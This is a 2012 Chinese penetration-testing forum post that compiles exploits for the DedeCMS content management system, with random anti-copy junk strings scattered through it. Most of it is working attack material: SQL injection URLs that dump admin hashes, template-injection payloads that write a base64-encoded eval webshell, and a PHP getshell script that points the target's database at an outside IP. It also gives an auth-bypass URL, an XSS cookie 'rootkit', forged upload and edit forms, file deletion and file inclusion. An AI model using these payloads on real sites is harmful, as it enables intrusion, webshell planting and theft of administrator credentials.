中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结

8 B1 N) @- Y# A' u4 K6 kDedecms 5.6 rss注入漏洞
; u; B( v  x" R9 Qhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
# F, b6 p+ O! Q' }1 E% Q% C+ v6 d
+ m" }3 a  b$ e! R0 Q: R3 z0 h- o
1 b$ p7 F1 Z% m4 \: A; |7 Y9 R
  ^- e( Q! C2 w1 l$ h) L

# ?- K3 H& b5 h2 e+ z
  q' _3 G7 C( d0 ~
9 J0 a% m4 q( U) T! D# m) F- M+ |( }: _1 Q8 ?, t8 I; y( y6 a/ k
DedeCms v5.6 嵌入恶意代码执行漏洞
; F# ~2 M/ {' \6 o' S8 U3 r% o注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}& p4 ]+ f/ ?7 k$ d
发表后查看或修改即可执行
8 U3 `/ w: f2 u- S0 F7 H/ w/ r; ua{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}: V1 x- Y. v9 v- \1 s' I
生成x.php 密码xiao,直接生成一句话。* W: X/ [6 n0 G# X8 h

* O  I7 h9 W" E3 ^5 Q: Q2 n
2 f* t0 `  n" R+ H7 f0 K' w7 e
/ ?, i- V7 l9 L  K" D- P  S, \+ x7 m3 Y" c! |! V1 ~0 H
9 R7 q9 L6 T% I2 b& z
) X7 V" n2 G5 D, x$ x5 ~# b7 H4 y- S
, J# J9 ?9 m" K6 U) R+ I
/ I% K7 |- a6 ?8 X4 E2 x
Dede 5.6 GBK SQL注入漏洞
8 \: W2 U" u$ w- _) `0 ohttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';2 e7 ]5 `7 b! Q- u
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe1 v2 b3 O% v, z  ^8 C
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7+ j: k3 e, [3 i8 b- `8 A6 J& m
6 T" X' ]% y2 a  w

% n1 `- V  J( b$ p/ m' g; s8 i  q& R9 J
' U- Y; g( d' n7 R2 D

8 ~. o+ ?, ~& }2 ^3 |+ h4 ]" {# K* H1 V5 ?7 b

& I, o) f$ `" H% g; u5 j
  _' X$ R; M, T/ G/ I) xDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
" l' e3 W% R0 Z( ~9 rhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
6 k; Y7 c+ H, B- ^
  k0 L% {# p/ z8 Z# n
' c8 d2 y! G1 \5 Z7 z) Q3 |) X8 u' ?3 k% l8 \$ M# E- ^

3 Z1 ?7 B, @' c- E, B) |# O, K4 Z
5 C/ n& H8 ?- Y; G0 y2 }2 B* q' P2 |
DEDECMS 全版本 gotopage变量XSS漏洞/ w6 t# o* @9 v; \
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
) O- E) m' j0 s! \* ~& c% U# m- Z' xhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
/ N+ W5 F0 l- k1 K/ }  z5 W3 [% B4 I
* r7 F" _8 _* |
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
0 r) c$ z' [+ o( O5 s3 ^http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda# S( V! s: ^4 q# F8 F
4 M8 t* u& O( A* s* P2 Y; K

" U7 m) l6 C; U# y: j1 zhttp://v57.demo.dedecms.com/dede/login.php9 O: ]! E$ x3 g. m. }% L
' Q( B) E' l) n
+ \3 E- h0 t4 L; g# [8 W. ?
color=Red]DeDeCMS(织梦)变量覆盖getshell
# t$ e, h* N# q#!usr/bin/php -w9 R0 m+ S. m7 }' h6 @- \4 k  q, J
<?php
7 P' r/ S# [! {error_reporting(E_ERROR);
+ s% Q0 r( r2 i4 }set_time_limit(0);
; E. ~5 f3 C8 p" ^' W8 r) [print_r('9 A. V* ?: X- Q9 H
DEDEcms Variable Coverage! o2 x) ]& H5 c/ |
Exploit Author: www.heixiaozi.comwww.webvul.com) C9 S8 H; J8 x
);
. M& t: r* `% b. x3 s, Lecho "\r\n";
* w0 ?9 K5 u* |$ ], }, uif($argv[2]==null){' Q* [- H$ F" l9 j  d% G
print_r('
  q4 K+ s: j* X% j) M% L2 o, v4 ]+---------------------------------------------------------------------------+1 b' p4 s! p- {
Usage: php '.$argv[0].' url aid path# N3 K( P  m+ h8 b' M. {' v$ O* N
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
: ^5 P+ x' m5 v' y/ v" jExample:
  o0 S; y  Y, Q4 ~$ Mphp '.$argv[0].' www.site.com 1 old/ ^  ]: Y$ J# {2 }" ?* A6 F
+---------------------------------------------------------------------------+8 l; f$ `% ]9 b/ U! s0 {
');
+ E1 D" r( p% |$ gexit;
  ~7 d9 I; ^) R9 R4 }- S}% n- o0 X( B+ p
$url=$argv[1];! u5 Y: R) f) H  G! j
$aid=$argv[2];; C. k" P7 K. J2 Z$ v
$path=$argv[3];4 Q  V+ W" F) L, @4 p6 N% |. m
$exp=Getshell($url,$aid,$path);
1 m* l( L0 U' J, v0 b! G8 Tif (strpos($exp,"OK")>12){
9 j" U: S' o. }' r" ?$ zecho "
, @6 K* Q% f% p1 e$ A* eExploit Success \n";1 G" p# k7 c# V1 H# ~! ~1 o
if($aid==1)echo "
, p5 h" S( ]) `' D1 X! j2 _1 }& @Shell:".$url."/$path/data/cache/fuck.php\n" ;" \8 w% v! o+ _) ^- u2 Q- R% ~
! x! A* q) @' G7 g2 U) B9 l

  A4 p+ I& _/ a  ]. i" hif($aid==2)echo "
! ?% Y3 ]9 e/ l$ X, lShell:".$url."/$path/fuck.php\n" ;' z0 F* Z8 b, K$ }; {4 p1 f

1 E. [& J3 I$ a4 c# C% i$ C1 c, U5 L. E  A6 x
if($aid==3)echo "
* j, N0 r( ~; t, G6 v* uShell:".$url."/$path/plus/fuck.php\n";
$ n: e: V1 S0 e9 K/ v: s3 ]
& T  O, F9 L/ j! V, o/ }* ]8 F& i
}else{
8 o4 b. f8 k/ R) Kecho "
+ L$ L0 {( ?) ~  u9 L  z! l' ]Exploit Failed \n";
  b8 p- |# g' `5 r9 h7 a9 f2 f: Q}" H+ n4 p& b* j3 M, L1 C
function Getshell($url,$aid,$path){
6 l7 B$ L! @: q& O, k$id=$aid;, x3 R# f- ]" j% `8 S& ^" Y
$host=$url;
6 \5 i$ ^0 w# r+ y$port="80";- L7 m; T+ x# q
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
' V% V- t$ l5 M$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";* v* f- c+ X  U. y# y
$data .= "Host: ".$host."\r\n";( [9 N7 ?$ r2 l# p8 |0 M
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";" o. S, n, O& G" d& t$ p* l; c
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";2 A& X& q+ q! s  Z  E& B
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";* S/ i/ m9 k- R2 s5 x  t8 U
//$data .= "Accept-Encoding: gzip,deflate\r\n";
2 C3 V6 u/ X( o& A$ P2 o$ f. W2 m$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";  q6 ^( N) w& Z, @# d/ \
$data .= "Connection: keep-alive\r\n";
$ t- X9 q6 h3 [4 Y/ b1 [$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
* b2 t5 k+ X* H3 l' f! A( [8 A$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
' h: e+ n" Y3 X5 T% Y$data .= $content."\r\n";8 D6 d- E  k* p
$ock=fsockopen($host,$port);
$ Y1 @$ @& S+ Vif (!$ock) {
& E2 c- r+ \: U. U1 {$ W2 ^3 Wecho "
( r( r* c) @1 x0 Q) y4 K; gNo response from ".$host."\n";
* R7 ?" F' @& ]) s}0 E/ x. U  k0 d3 ?) E
fwrite($ock,$data);) {1 v' j5 A& j, Q1 u2 O: s
while (!feof($ock)) {
9 F: N6 d9 G: n1 ^1 X0 Q$exp=fgets($ock, 1024);" \* J7 b7 v1 e
return $exp;, ?4 A# @9 C: z) p- h
}
7 w8 {5 e8 m; O/ y: ~}& T- `" `, {2 l* u8 \- ^4 G0 ]( n

# i, q  q$ o4 N( H' Z. q  [7 ^
+ q8 p( U6 D+ x, e  c8 y" f7 f9 r?>
9 Q+ J6 E5 }$ g9 ~9 F
4 \5 {, q/ D- i  X8 o) P1 W' M7 s/ ]8 c; s' J

4 j7 s! n- c0 S' p8 ^3 r7 L0 a7 Z( |/ X" U

& `" }# p+ K4 W; W0 K' l& A8 d
1 U0 W3 O) ^' ^# P# J
+ ~' K7 z( a6 z# H/ s5 c" A6 L5 y, }% |9 C0 d, }$ {

: P4 {3 [1 m  b. b
! l: g. u8 p& S, k0 GDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
! T) N; m# a: y  Q4 Jhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
$ \% U: T0 \( N# T  {
$ r4 {) V& G1 P0 T* G" q3 E' z  V+ |* P7 ~
把上面validate=dcug改为当前的验证码,即可直接进入网站后台& i4 p6 p9 h/ }& M( y" R3 Y5 E

; a) y" X, c6 f! I$ c* z4 n
: A1 a$ G' i0 t' h此漏洞的前提是必须得到后台路径才能实现
* ?. O! l% ]- X! B1 X' X; [' u7 y+ |- p5 P, ?, E- L1 P4 v
+ \2 M, p$ L: v
8 B9 g( r4 O8 r* g* J2 i

0 e8 T0 x# u: u  E3 X/ K
2 G2 b4 Z$ H2 O( [# C1 r; E4 o5 V3 S6 t: ^$ m* i6 A+ n

4 z+ z  C0 X  S+ m2 `- f8 i8 S- W. _# ]& ~  X1 g/ Y

* ]: g- a* x- d  Q( h6 B
! L, `" _) C  \) Y6 \& `Dedecms织梦 标签远程文件写入漏洞% C* M& C& C$ S7 H; L. X6 D3 g; a
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');. L9 m# h) X# z4 f/ ^: J% p, C' f

9 s# y, l1 N+ r- n+ W
  o$ W. i0 |1 O- t3 l6 R再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 + i" V% q$ H, n1 T- S
<form action="" method="post" name="QuickSearch" id="QuickSearch">
. X7 b) T. T# `% y<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
# W, v; b2 `; J5 f<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
8 l8 A; g0 A4 j6 u; }) j<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
( j- \+ w% Z/ W) ^4 _, O<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />& c; G9 w8 F0 g/ F* Q4 u
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 ]* {1 F7 k* x9 a6 p# }0 S+ C. O<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
+ H, Z$ D$ R; Z  h% V( z<input type="text" value="true" name="nocache" style="width:400">" K! E' w! F) [/ F  Q3 R1 G
<input type="submit" value="提交" name="QuickSearchBtn"><br />
: U/ ~$ [/ [4 I</form>
7 d4 b' _7 D; t8 H% _<script>
) C0 |  D, O: `, g1 L  Qfunction addaction()
, D( R$ J+ p& O( \& a  {{: q% v7 _! u/ u# J! O1 L: o' p
document.QuickSearch.action=document.QuickSearch.doaction.value;1 p2 t! K7 I( J$ o6 v
}
4 G2 w8 ]3 s# V6 z% m3 u- E</script>
, ]. w; o4 S0 M0 {
4 q6 L9 A  W9 {9 A0 K7 n) Z$ L% d  }8 g6 O* j! j( a4 E4 r  w$ U- {

: X% N/ \$ x% d" i; g. m1 \5 K# [6 Q+ j
" _/ m( f  d7 q+ E( O; a& l/ f  u0 X9 P1 t
8 }" c, E- T( z

5 ?. s* X5 k- q; ?1 J
0 F, C( ^9 p% M- z" g2 X9 r
7 }% @; E1 Y  @! G- l, h
: T3 N& q0 l2 J4 C9 gDedeCms v5.6 嵌入恶意代码执行漏洞
1 m$ {5 v- j) U/ S1 M注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
9 l# V0 K/ }% t" W. N# S& }! Ga{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& V7 U  F# `  l
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
, l2 X1 u) Q: F" I- x! }Dedecms <= V5.6 Final模板执行漏洞
$ V+ M- Z* o, w3 Y+ J: N注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:0 @+ @( h7 Y" u6 O- n6 B
uploads/userup/2/12OMX04-15A.jpg6 ~% T$ [4 M4 A$ |5 }3 R8 {  m- R

8 V; N0 Z+ I3 s5 J5 u
7 N' O& l$ x- Z) o4 a: r模板内容是(如果限制图片格式,加gif89a):
- @: T8 n5 ]: u' |3 W6 x5 I{dede:name runphp='yes'}
( G6 r' n- }: A$fp = @fopen("1.php", 'a');7 y# W' @' |* Z/ O& l: ?
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");2 j' l* D7 G8 P. Y/ k$ H& i
@fclose($fp);: c8 x6 ]( {, N3 E! o
{/dede:name}
, b' D8 ]  v/ G2 修改刚刚发表的文章,查看源文件,构造一个表单:
) W" E# C9 z, O3 u, h<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
4 s; U6 ^" n  I! U<input type="hidden" name="dopost" value="save" />
) y) [+ k! a- ^# v8 o  q" M<input type="hidden" name="aid" value="2" />  d! l1 P, O6 D1 @; Q  v) m
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />1 b+ L0 B4 L; ^: T2 A5 o
<input type="hidden" name="channelid" value="1" />
7 f  `0 ^! U3 R/ w<input type="hidden" name="oldlitpic" value="" />
4 t( V$ p, s8 ~% _& _<input type="hidden" name="sortrank" value="1275972263" />
$ f' N7 J! S3 L4 i/ p5 s) q, x3 E9 p  V" {3 F+ m* `: F

9 J. ~7 U* a" y8 r<div id="mainCp">& q. K# [2 \0 u
<h3 class="meTitle"><strong>修改文章</strong></h3>2 l4 v) o4 P2 l- P
% \" r' ]$ f1 S5 P% y5 y" N8 n

% E4 n% {5 P; A; l+ Q/ u<div class="postForm">
* _- p' n$ ~. T% A  y( v8 z<label>标题:</label>1 C9 |" p9 Z. f7 A
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>+ m! U3 O# U/ x7 F2 c) s

8 b7 [. s- [0 `6 ]
: u! O4 L3 d2 ?0 [! G) Y<label>标签TAG:</label>  f7 O  c; P9 S) l3 ]" |
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)/ \! |4 ^1 E; D6 B4 s: L6 Y: s: V
# w; m/ O7 B' h2 o' Z0 q

- [5 f& V  g8 d<label>作者:</label>7 B. e% X5 x4 |' s
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>, Q' U3 J* ~2 h1 B: }  S

! }/ }: S/ q0 Y
0 G/ {: h- U! s! S/ j<label>隶属栏目:</label>
5 U' |) X- A1 b3 U, n<select name='typeid' size='1'>: w" ]& _3 X0 u" Q
<option value='1' class='option3' selected=''>测试栏目</option>3 E$ Z: c- |4 T! O
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
; Q, K& G: }6 D) {! V  l, A3 ]- s! ~, J. \, p: V8 U. z& P+ a
8 Z4 n$ z1 ^* _
<label>我的分类:</label>6 D& m2 m8 T2 g+ @
<select name='mtypesid' size='1'>. P3 \: E" L! w# X$ G6 b# h1 K: T
<option value='0' selected>请选择分类...</option>
) H3 j7 E# s2 A6 ^<option value='1' class='option3' selected>hahahha</option>, n) P) O" P8 |6 z
</select>3 j1 E# h2 m9 I, |" [- E

- v$ u8 U& u4 @$ m
" ~+ N6 y( t8 |) V<label>信息摘要:</label>5 a$ ?% n% _5 X/ ]4 A5 o
<textarea name="description" id="description">1111111</textarea>: |& v! z7 S9 {5 n6 B
(内容的简要说明)3 v1 E% H2 U" u7 g8 j  @/ L
( H1 a! b, {/ k, j3 H) s2 W

- p* V4 y5 b2 i9 y<label>缩略图:</label>9 B% q0 r* C9 G* O) ?
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>5 c% q: w) Y6 P  j8 x6 ^8 ?4 [

, Z% x/ U- S( S
& u( f2 s. z5 B8 \<input type='text' name='templet', Y! r/ L5 T( K3 k' Z4 }4 g
value="../ uploads/userup/2/12OMX04-15A.jpg">" x+ U# L1 h2 r$ G1 y
<input type='text' name='dede_addonfields'' T4 ]! B9 c! a$ n/ t! M6 k( r
value="templet,htmltext;">(这里构造)/ |+ Y7 j! X$ J3 A* i
</div>
& f& ?7 J# p6 ^% V* I) O. p" m6 ~7 T
2 C, d; [7 F% k+ B' h5 O/ a
<!-- 表单操作区域 -->
0 R# ^1 [: `8 `# G<h3 class="meTitle">详细内容</h3>
3 x' J# I) B1 l' [4 C/ K# H) N! p. N8 A' j9 V& \
: [3 m. Y1 p$ h
<div class="contentShow postForm">5 L: v4 C! l: h2 }* a1 t; x
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>3 x9 b  }. N9 Q  R. G% f  J" a

6 j7 r0 i7 {% i. [/ V( K7 w3 Q7 E/ o
<label>验证码:</label>1 i- o# M8 v8 M" d8 ^
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />6 Q: b5 [- H1 b, ^; V3 y7 N, D3 }
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
( N, D3 e" w) s) N, h4 a5 f5 N0 }' _6 |
/ w7 T! v1 k, g% l
<button class="button2" type="submit">提交</button>" t5 r& Q. u. O: a/ N8 f
<button class="button2 ml10" type="reset">重置</button>
' u7 g& B9 I: H6 l2 I</div>' n. p4 D- m; f

! f" {1 E/ N# g# X0 f- U
; a' k. a( ]) L5 |9 V</div>5 A& \& c+ ?% w0 g* \2 |

2 Y3 ^; m( W, T+ X  M" M5 J/ r9 }
3 {! G4 Z) r$ g) X: ^2 c</form>8 i6 f! ~3 M% L2 \! @
& a3 n! S8 J% d3 r0 U
7 Y# o$ u0 P$ S  B
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:1 `0 H$ Z% w4 t
假设刚刚修改的文章的aid为2,则我们只需要访问:/ }# k, D* B* Q& z
http://127.0.0.1/dede/plus/view.php?aid=2
/ ?# a9 B' L# S: a/ @% N即可以在plus目录下生成webshell:1.php
: \  K9 f7 H9 m4 {
2 x2 W; I% M* r/ [! p3 N& g
) R4 c" x, P( F: x# ^  i; N" B; z% |; r4 |/ h; `
0 u( D1 H' V# N9 y, l7 O
8 t2 k* T9 C; I
5 O6 g3 `& e% J2 l% x5 A  t# M
9 t* P! C7 k2 \; U! B. J3 @/ O0 [4 N
% P! V# F& u8 \7 T5 [- T' ^

" a. ?9 j9 d9 ?' }! K. d, M  x, r8 q% D2 M8 E7 {" Y

# U8 P& c# k/ G: e$ C- C2 b/ O4 j
2 j* z, A1 {; \2 E/ A: v( MDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
3 X. ?; A& M' `Gif89a{dede:field name='toby57' runphp='yes'}9 V! E+ T; P2 N3 x, P
phpinfo();; u$ K3 P& W/ J6 u7 o# x+ S# w
{/dede:field}$ a& P. b: r' t: t
保存为1.gif7 o* E! @$ F( y% b
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
1 q: I9 X& b2 l9 I<input type="hidden" name="aid" value="7" />
0 q2 G' p1 u4 m. p<input type="hidden" name="mediatype" value="1" /> . S1 a: g4 l' C  h# _( h. o  r
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> . L: |* \6 C! U4 U: i. L
<input type="hidden" name="dopost" value="save" />
4 |# A2 J$ |  q* c+ Q<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> # ^$ r: l5 ]7 b
<input name="addonfile" type="file" id="addonfile"/>
1 S5 k! N" r& i$ Z9 @<button class="button2" type="submit" >更改</button> ( y" B! O. m( O! L. b+ g& q: Z
</form> + ?) j7 G% H; _9 {7 ^: ?5 r
# u5 D& q# @# I! v% g/ J* ^
8 v4 _9 K' T; q+ D" d3 H9 e9 e
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
8 g+ O! }; R% n, V  T* g发表文章,然后构造修改表单如下:8 R& `8 E: x2 F! q9 H( v$ E! y
/ C( m3 L4 D5 r3 L) n1 a/ K( Y( ~
; |! z7 N5 s" C  _* Z
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 1 G& }9 g' [+ M$ Z8 D) |
<input type="hidden" name="dopost" value="save" />
5 @& x( q' K9 x( C$ c2 z( S<input type="hidden" name="aid" value="2" /> ; ?# I! s! K8 n8 A2 p+ ^6 K8 I5 ]) ^+ a, g
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
) z" h5 y0 G# k3 p3 N  d<input type="hidden" name="channelid" value="1" />
3 t$ y% `1 q2 b<input type="hidden" name="oldlitpic" value="" />
) a' R9 B* i* O2 J<input type="hidden" name="sortrank" value="1282049150" /> " m: D  E  r% x% E) q- j& ~8 ~
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! ]4 T, k( ?" u/ ]& W<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
* q: t; L6 S) U( E9 `+ f1 ~<select name='typeid' size='1'> 2 a$ [( u  D) g2 K0 N, k
<option value='1' class='option3' selected=''>Test</option> 3 i( p1 @6 ^3 d  e& f
<select name='mtypesid' size='1'>
$ a9 M; ^+ T9 K<option value='0' selected>请选择分类...</option> 9 c/ e; P8 i! C. T# z/ Y8 `6 o
<option value='1' class='option3' selected>aa</option></select>
  f+ F& F3 N6 x<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
/ z% K$ F" ]8 L, b# z! W<input type='hidden' name='dede_addonfields' value="templet">
0 k( v2 O5 Y$ N$ K9 K<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> * p( x8 }& c3 g
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
. k+ ?/ u/ x9 z% ]$ ^# Q; C<button class="button2" type="submit">提交</button> - M7 E1 p) X) M: E" W2 F# f
</form>2 M. V* t+ M( R
$ h8 B$ ?+ _4 z
+ G: Y, n6 l, R

5 K. N7 y7 O' _* `" t: o: u2 `
1 `) r& p( X+ i* x: Y! Y1 C. A0 A- @' S5 W
; W4 r0 |$ \2 O; f' \% F! D
6 L- n6 O7 n( ]$ n' n+ F# }1 D8 ]' f
, E: s. ^$ A8 o% r; K4 L& l

: E; a% M3 X- Z7 D. o5 P3 l# u5 K" s1 d0 V, E+ S
( W" a* Z; Q. T2 v

! X7 |; J; n& \1 J8 c- @5 B3 _织梦(Dedecms)V5.6 远程文件删除漏洞
) m! G1 ~6 A; N/ K# dhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif5 h% ^  J" S& i+ G2 D, c$ V3 [4 \; l
) Z, u" B+ a) [$ Q) l3 O. x
# V- l3 v' S% n8 H6 y

: `6 T% c. t" ~! W, E# M9 M: Z# i$ Y2 A) v: i$ S
$ H1 x. Z. Y4 s; R5 Y1 K2 q
  K: j% D9 [2 l8 u6 I
7 b; s& O7 p0 F

+ P3 d% f9 \! J$ P1 ^  `' a# s; e& t# H

8 R3 e& W" [& K! [2 ?8 [织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 : ^% A: F- i+ U8 a5 S/ c
http://www.test.com/plus/carbuya ... urn&code=../../' C2 ]9 ]7 s$ E. K) |: @

1 Z5 y+ j$ O& `7 C& w
; q  |1 S# t- [. D2 X& w# E% M

+ N; G- X( Q$ J9 N, Z; F: X2 e" e, _
' N5 Q* j( b  d) C+ y

0 |; ?+ Q4 b  b1 @/ O* r9 t) U' p* i" ?% [; s7 o

  d6 y  P: Q6 u# `) ?' ?5 g
7 D  f- M8 k1 z  b  yDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
. K8 \3 X2 p# y, O5 Q; dplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
' }1 d- \! e9 X* A' ]5 ?密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD53 l( T8 P- H6 R" K! x
) j5 c4 u4 F) o8 N; A6 p

; m; J* x; l0 V8 @, b* @7 D- f# V  L5 `1 W1 o) u5 V- |2 |7 u
3 `( b# c: J# t5 J6 s7 H; u

# A$ D4 g- l* A) b% b% K2 [
- M) J/ {* h! R* L. u0 h6 o
" v, @# D% @3 J  V
5 M. E" Q/ X8 N, u( c0 V. B+ Y
* {, H. u" T3 P3 i6 K6 p
# e7 p2 A1 G( J4 w7 x' n! n5 \织梦(Dedecms) 5.1 feedback_js.php 注入漏洞4 i8 U0 W2 r5 ?# v! f6 q& ?
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='$ p0 ~8 e" \' ~& @2 `, o0 X

( K! `: \6 v* \6 ?9 F7 ^7 W% b5 c$ W/ \0 p6 R' N; i" c% [5 @

7 k8 P# z4 ^, [+ f: f6 Q& a1 F
' n; [! ~5 D7 |! N6 U
# j$ p: x3 n, b7 m+ \: `! e( D) y% m+ e) K0 C/ \: C
! b9 L  R# f7 J% d' G7 c( V% `
